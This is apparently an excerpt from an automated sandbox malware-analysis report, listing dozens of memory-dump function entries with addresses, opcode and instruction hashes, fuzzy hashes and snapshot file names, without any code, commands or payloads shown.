                                                  • Opcode ID: f39fb5e617a994d031df85e52eba40ad680544398efdaca88bdec1d78132a629
                                                  • Instruction ID: 585ca11aed9748f427bbc369570001959cf70989bed58a857ab46c7637340367
                                                  • Opcode Fuzzy Hash: f39fb5e617a994d031df85e52eba40ad680544398efdaca88bdec1d78132a629
                                                  • Instruction Fuzzy Hash: 9021C531E186098FFB98DB58E895A78B7E2FF5A311F4041BED14EC3591DB24AD058BC0
                                                  Function 00007FFAAC6CAC26 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65db28ec12ebcc7c6abd73b4525a3133a56640688157549231c86ead7f097cdc
                                                  • Instruction ID: 64598c957bd805d6db7b22bae186db50eeb419bf5739968037e4425938047b7a
                                                  • Opcode Fuzzy Hash: 65db28ec12ebcc7c6abd73b4525a3133a56640688157549231c86ead7f097cdc
                                                  • Instruction Fuzzy Hash: 2931FA70E1991D8FDF9ADB28D461AB8B7B1FF59311F1051BED00EE3692CE34A9848B40
                                                  Function 00007FFAACA81F27 Relevance: .1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1996314013cd8d8c8d9218e244571bb0c18cd1cf3d2df50df29c0c4f159dc288
                                                  • Instruction ID: b4293e738aa73243f82ef22bcc87a75a425980fec83d86831dd3e0ee1b990f13
                                                  • Opcode Fuzzy Hash: 1996314013cd8d8c8d9218e244571bb0c18cd1cf3d2df50df29c0c4f159dc288
                                                  • Instruction Fuzzy Hash: 61116331A08A188FDB98DB18E895AB9B7E2FF59311B1041AFD04ED7262CB31AD458B41
                                                  Function 00007FFAAC6C170D Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67879e5e30a8256089f0f25b0eca863ca40dd997a694a209a21f4cae3fc1197d
                                                  • Instruction ID: 5ae74a9b22cde96509f9d6470c94deca25956415125f1d972eb66c47d77a48d7
                                                  • Opcode Fuzzy Hash: 67879e5e30a8256089f0f25b0eca863ca40dd997a694a209a21f4cae3fc1197d
                                                  • Instruction Fuzzy Hash: 7521393591DA4DCFEB8ADB58C8505EDBBB1FF59310F60507AD00EE3291DA24A9198BA0
                                                  Function 00007FFAACA82389 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0215b7141428afd43897f74c2499d431e5bec9d4b6b82f35e7d4a8d29e839773
                                                  • Instruction ID: 988a122b095f5022129d5b3ef2208ba46cc65ab65e7b694d9e363012caf53987
                                                  • Opcode Fuzzy Hash: 0215b7141428afd43897f74c2499d431e5bec9d4b6b82f35e7d4a8d29e839773
                                                  • Instruction Fuzzy Hash: 3F112631A1E7898FF369936458156BA3BE6DF17340F04427AD04FD3192ED5CA90AC7E2
                                                  Function 00007FFAAC6C2D63 Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d80eebd068c0b24cc0ad394f3a2d073d9f83b85dc078a7bb48521d51ac18f12f
                                                  • Instruction ID: 823c868641356721cef833a380cb769947c3c37844c27a6729192b3367f774dd
                                                  • Opcode Fuzzy Hash: d80eebd068c0b24cc0ad394f3a2d073d9f83b85dc078a7bb48521d51ac18f12f
                                                  • Instruction Fuzzy Hash: 4511A530A1DA098FEB9EDB18C895A3877E1FF5A301F5061B9D44EC7591CE28EC458B80
                                                  Function 00007FFAACA83FF0 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1fd104d781467dbcefe5134930cc27a44d330967153512577437b2d61eacc61
                                                  • Instruction ID: 3cf9fa455d83cc8c9007648ae8fc90ebd43e272d36ea5eace5576cef8ae25324
                                                  • Opcode Fuzzy Hash: e1fd104d781467dbcefe5134930cc27a44d330967153512577437b2d61eacc61
                                                  • Instruction Fuzzy Hash: 5C11083093D566CBF628D328A4709B67272EB96309B14C675D05F8B48ADC2CFA8997C1
                                                  Function 00007FFAAC6C3F30 Relevance: .1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 735321b23820c80f839540be4c0c85435564bc9886d81a608b3526d743bfaffd
                                                  • Instruction ID: 7ed69646b5ba45cd1ce9a20acde19c154c53a4a01581909e449bf333c412b41b
                                                  • Opcode Fuzzy Hash: 735321b23820c80f839540be4c0c85435564bc9886d81a608b3526d743bfaffd
                                                  • Instruction Fuzzy Hash: F2110421A5DA0A8AE799EB29D4505FAB791EF56290B54593AE05FC30D2CD18F80E83C1
                                                  Function 00007FFAACA83070 Relevance: .1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf91347d1bd6d5e90910b202668effc29882eaa2bafd485c4bebc57c64aeaeb2
                                                  • Instruction ID: 81d5d68ca474dbbe4b1723f77aa4205a74a40a6c3ae302e619688e16ce88c175
                                                  • Opcode Fuzzy Hash: bf91347d1bd6d5e90910b202668effc29882eaa2bafd485c4bebc57c64aeaeb2
                                                  • Instruction Fuzzy Hash: 8E115B61A2DE498FE759DB29D4405FA77A2EF86250B50467AD04FC30E3DD18F90D83C0
                                                  Function 00007FFAACA8A9DE Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90ae793e50882ba4141a64b2bb146f09d36c0ccc3ccaf6e45fa7560cf514a6d1
                                                  • Instruction ID: b8a460bd7c6b149cc2d9a576dcc9e48c981ab9eb882a8c9502babff105ca008f
                                                  • Opcode Fuzzy Hash: 90ae793e50882ba4141a64b2bb146f09d36c0ccc3ccaf6e45fa7560cf514a6d1
                                                  • Instruction Fuzzy Hash: 2D11973261A64ACFF7198B18A4586F83B83DF52311F24817BD40EC71D1EA28EE1983C0
                                                  Function 00007FFAACA8AB60 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: acc0f129d6438641c6ea6a30a86d5cbbe8682e08132dd4abb7cff451dd084f1e
                                                  • Instruction ID: 8947e0ee9fbf2bf7b119a5b5a47e1178d463f19e036e900f25fe4d7210feb996
                                                  • Opcode Fuzzy Hash: acc0f129d6438641c6ea6a30a86d5cbbe8682e08132dd4abb7cff451dd084f1e
                                                  • Instruction Fuzzy Hash: 1811D331A29A4A8BEB689B28A4409F97793DF51300B50497AD04EC34D2ED18FE4E83C0
                                                  Function 00007FFAAC6CC910 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b3efecbfe62c239c698b6bc7dddce021d2e881f8ab21d5c0e9e7c5000dca4961
                                                  • Instruction ID: bfd7fdca3ec152b8d78a2825626c1f5892c00b853631aae2c14b56485761422f
                                                  • Opcode Fuzzy Hash: b3efecbfe62c239c698b6bc7dddce021d2e881f8ab21d5c0e9e7c5000dca4961
                                                  • Instruction Fuzzy Hash: F5113621A1DA09CFE79AEB28E4509FA7781EF82250B50677AD05FC30D3CE18F84983C1
                                                  Function 00007FFAACA81ECC Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51ca09f312ea41169a0079595afe38a365610517828b128635ab88af296ad237
                                                  • Instruction ID: 03f503ec3864aadfa9cddac4a36533cccb8046c1d8fd5ce8c9f6ccf23d865fec
                                                  • Opcode Fuzzy Hash: 51ca09f312ea41169a0079595afe38a365610517828b128635ab88af296ad237
                                                  • Instruction Fuzzy Hash: 9911C631A19A088FE758DB58E8556B9B3E2FF59210B0041BFD14EC36A1CB30AD058B40
                                                  Function 00007FFAAC6C3DAE Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 19acde06bcfb595758aa5f17c0c4e780f8a9995f529f6ef485319b67ff7b7ce6
                                                  • Instruction ID: 7250f0fd453d49806cf132826b500dbae9bb1208d3b23d808bb43cdfd7483809
                                                  • Opcode Fuzzy Hash: 19acde06bcfb595758aa5f17c0c4e780f8a9995f529f6ef485319b67ff7b7ce6
                                                  • Instruction Fuzzy Hash: 1A11553230960A8BE70ACA0CE4557FA7790DB963A0F24113BD929C31D1D969A91987C1
                                                  Function 00007FFAAC6C92BA Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b29d0437fb525c6152701cfe8aabeb28b8eecd88f02648dd87267757a1b444b
                                                  • Instruction ID: 8d0d6ac79083cf7b5ca58b4c82e4e12c92a1417864cbf9d427b40faac23a5d31
                                                  • Opcode Fuzzy Hash: 8b29d0437fb525c6152701cfe8aabeb28b8eecd88f02648dd87267757a1b444b
                                                  • Instruction Fuzzy Hash: 59114821E0EA0DDBF767D26948052BE7794DF8B340F00617BD00EDB1D2CD58AC0A82C1
                                                  Function 00007FFAACA82EEE Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb68e0405ce8d46f349d1031b55a36a0120a81ced9731d63dd4707d183fb71e4
                                                  • Instruction ID: 6402cb3eff6dca4f275927da81cfd3b31f140ba7362c70d19884355a57d024a7
                                                  • Opcode Fuzzy Hash: cb68e0405ce8d46f349d1031b55a36a0120a81ced9731d63dd4707d183fb71e4
                                                  • Instruction Fuzzy Hash: BD115932319A4A8FE3098B1CE4547F97792EB82350F54027FD55DC71D1DA19AA298381
                                                  Function 00007FFAAC6CC78E Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 051745a432818cc2a6b8590759988461419bb098e5a5b650ba97a8928d06f5e6
                                                  • Instruction ID: 13d0bc8da495f2f20c22d104634882cb2a75addd87dd8cc5a787c0a8eae5f329
                                                  • Opcode Fuzzy Hash: 051745a432818cc2a6b8590759988461419bb098e5a5b650ba97a8928d06f5e6
                                                  • Instruction Fuzzy Hash: 1B11483224EA4A8BE75ACF1CE8547FA7B81DB92360F24127BD91EC31D1CA59E55883C1
                                                  Function 00007FFAAC6D0320 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49ac8f57f0f4ce3c48c6b852e913501156eb8b2ef9d52e4519cee5e979db84c1
                                                  • Instruction ID: f5b106d058bb548c50460be1719bb3fd24927620af4e32f40df5e060e4677586
                                                  • Opcode Fuzzy Hash: 49ac8f57f0f4ce3c48c6b852e913501156eb8b2ef9d52e4519cee5e979db84c1
                                                  • Instruction Fuzzy Hash: 5C01A16190AA4A9BF7B7D36544046BEABA1EF47350F14613BE00ED7181DD58AD0D82D1
                                                  Function 00007FFAAC6C2DC7 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96de0ba284c67dc1e108aac5458a4209b2505fe50a6d98585fc0fb51b427c791
                                                  • Instruction ID: 01256be3d28024c6711266e5c5fda175799cf5304ff53507fec7464f08e7b2b0
                                                  • Opcode Fuzzy Hash: 96de0ba284c67dc1e108aac5458a4209b2505fe50a6d98585fc0fb51b427c791
                                                  • Instruction Fuzzy Hash: B4111E70608A088FDB99DF18D895A69B7E2FF9D301F5142AED04ED72A2CF74AC45CB40
                                                  Function 00007FFAAC6C33FE Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a79c0953dea8aed3ff15f22be90fc377a0ec18be629d6894dfca8d012801181
                                                  • Instruction ID: e8baed776239d8b5cc806cd366e5a5230b38ecfe6a9a11ca528d847c3776ff38
                                                  • Opcode Fuzzy Hash: 5a79c0953dea8aed3ff15f22be90fc377a0ec18be629d6894dfca8d012801181
                                                  • Instruction Fuzzy Hash: 2F01D631A0DA898FEB4AEBAC94516FD7BA0EF4A360F54507AD00ED31C3CD19984687C0
                                                  Function 00007FFAAC6CAF82 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53d05406560e31af4fbdd297a40ea5a1805dd82d2f4d2e20fb07d3896a14e789
                                                  • Instruction ID: 3f07f8bd02bef7e87d77a3911c5c12a82fa84cdafa00f27dea5eceae5ea40681
                                                  • Opcode Fuzzy Hash: 53d05406560e31af4fbdd297a40ea5a1805dd82d2f4d2e20fb07d3896a14e789
                                                  • Instruction Fuzzy Hash: 8011C43144E28ACFEB13DB64C8558D87BB0EF43314B1450E9D41DDB0A3DA39AA4BCBA1
                                                  Function 00007FFAACA85840 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbebc02d18757793ffbd8391415125683e9d6b21edcdf35dfc7deb1decb69dab
                                                  • Instruction ID: 0c7a6e87a677f8c4135c172ccf82eaa2c793a9d9c6d7fdacd84cfcad6c43a2eb
                                                  • Opcode Fuzzy Hash: bbebc02d18757793ffbd8391415125683e9d6b21edcdf35dfc7deb1decb69dab
                                                  • Instruction Fuzzy Hash: 1A015731D3F193D2F639136AB4115BD64425F4AB20F24827BD60F821C1BC4CACACA3C2
                                                  Function 00007FFAACA8D3C0 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2bfbfc8b5878979f76eef9259aefa8c8238ea2b4f79ab9694d54843601242a9
                                                  • Instruction ID: 2f8df17a17e0adc0f5f0acb34d5acf1c49bb9f92aa47ce80f4447415e884daef
                                                  • Opcode Fuzzy Hash: a2bfbfc8b5878979f76eef9259aefa8c8238ea2b4f79ab9694d54843601242a9
                                                  • Instruction Fuzzy Hash: 4F01CB72DFE993C6F3681368741317D2D026F82B18F648176D40F861C2BC4FE98822C2
                                                  Function 00007FFAACA883A8 Relevance: .0, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2499c7055bb7ed759dc498c7bcfbd9fa84870e3d50b81bdd0558aafe75f6f5d
                                                  • Instruction ID: 03a0c2ffd731e494b3b8c44cb3dfe515bf7dd13accec12cd3cee7546d021fe6d
                                                  • Opcode Fuzzy Hash: b2499c7055bb7ed759dc498c7bcfbd9fa84870e3d50b81bdd0558aafe75f6f5d
                                                  • Instruction Fuzzy Hash: 3911957092981EDFEB94DB98E4909BDB7B2FF59300B504079E10EE3291DA34A945CB54
                                                  Function 00007FFAAC6C2D6C Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b001d48815c9b7b24e1e76c12a362a31decf8a61fe1ad47b62f816e28890617c
                                                  • Instruction ID: a181742378d5ccb7b3ccc3b4e9e5b949cc60219e7d76f14d74c923ade6c5921d
                                                  • Opcode Fuzzy Hash: b001d48815c9b7b24e1e76c12a362a31decf8a61fe1ad47b62f816e28890617c
                                                  • Instruction Fuzzy Hash: A8017530A09A08CFD799DB28C899A79B7E2FF5A300F1051AAD44ED76B1CE34AC45CB40
                                                  Function 00007FFAAC6C10F0 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b8242917ee743434dd5af27dcc793ef9bc5fbe945f9bff4ee000d2229ff28fa
                                                  • Instruction ID: b262104e7b8660b3671db45640e2f0f3c347a94c419e3837022d2775b363a0d2
                                                  • Opcode Fuzzy Hash: 1b8242917ee743434dd5af27dcc793ef9bc5fbe945f9bff4ee000d2229ff28fa
                                                  • Instruction Fuzzy Hash: 66017C3050840A8BDB89EF54D0C2DAAB361EFA531171082B5D40ECB35BC928FD95C7D0
                                                  Function 00007FFAAC6CBDEE Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b914519ffc789c5964bb8897a5ac086fcefb96018ac4a0af8fdf5d77768a6d1
                                                  • Instruction ID: 787accc7ef90e0e5852f4696446bc439904589e722fe340c560f49e8e250bcfb
                                                  • Opcode Fuzzy Hash: 4b914519ffc789c5964bb8897a5ac086fcefb96018ac4a0af8fdf5d77768a6d1
                                                  • Instruction Fuzzy Hash: 9801A770A1DA888FEB8AEB6884916AC7BE1EF4B300F1554BDD55EC72C7CD18D846C781
                                                  Function 00007FFAAC6C328A Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2048cee11e42e432b5ee07d5c89866691a818641dd1c3c8945ef21f00ed789fd
                                                  • Instruction ID: 2b047252c0496d9d04fda0a5e6103faf21b956cf4cd73ba4a0216da4fd7b5557
                                                  • Opcode Fuzzy Hash: 2048cee11e42e432b5ee07d5c89866691a818641dd1c3c8945ef21f00ed789fd
                                                  • Instruction Fuzzy Hash: B5018421D0E7868FFB13DB6888955FA7BA0EF17310B1861BAC04D8B1D3DA6CA4099780
                                                  Function 00007FFAACA816F2 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12178d4dc1ef3613d5a6c0bf3fbbae2750bfb7ac5c20a7f2b8aca0aceabd08d5
                                                  • Instruction ID: cd0a0911d1a9744e13fcd582f9df05a9e90486b2a8e55fbe82f8f47f1d9d4215
                                                  • Opcode Fuzzy Hash: 12178d4dc1ef3613d5a6c0bf3fbbae2750bfb7ac5c20a7f2b8aca0aceabd08d5
                                                  • Instruction Fuzzy Hash: D7F0C23285E3C6DFEB068B7098514F53FA5AF43204F0840FAD149870A2D52D960ECBE1
                                                  Function 00007FFAAC6C2592 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3524c7136d3be34c4ac29497743263e42b3fbef663052ae48cac1784b82d2884
                                                  • Instruction ID: b54fbb952f63eba125a492fae5b08a2dbce9d011f40765f6b1441ef8932386ec
                                                  • Opcode Fuzzy Hash: 3524c7136d3be34c4ac29497743263e42b3fbef663052ae48cac1784b82d2884
                                                  • Instruction Fuzzy Hash: 88F0363145E2C5EFE703DBB0C8115A67FB4AF43214F1950E7E449C70A2C96D565AC7A1
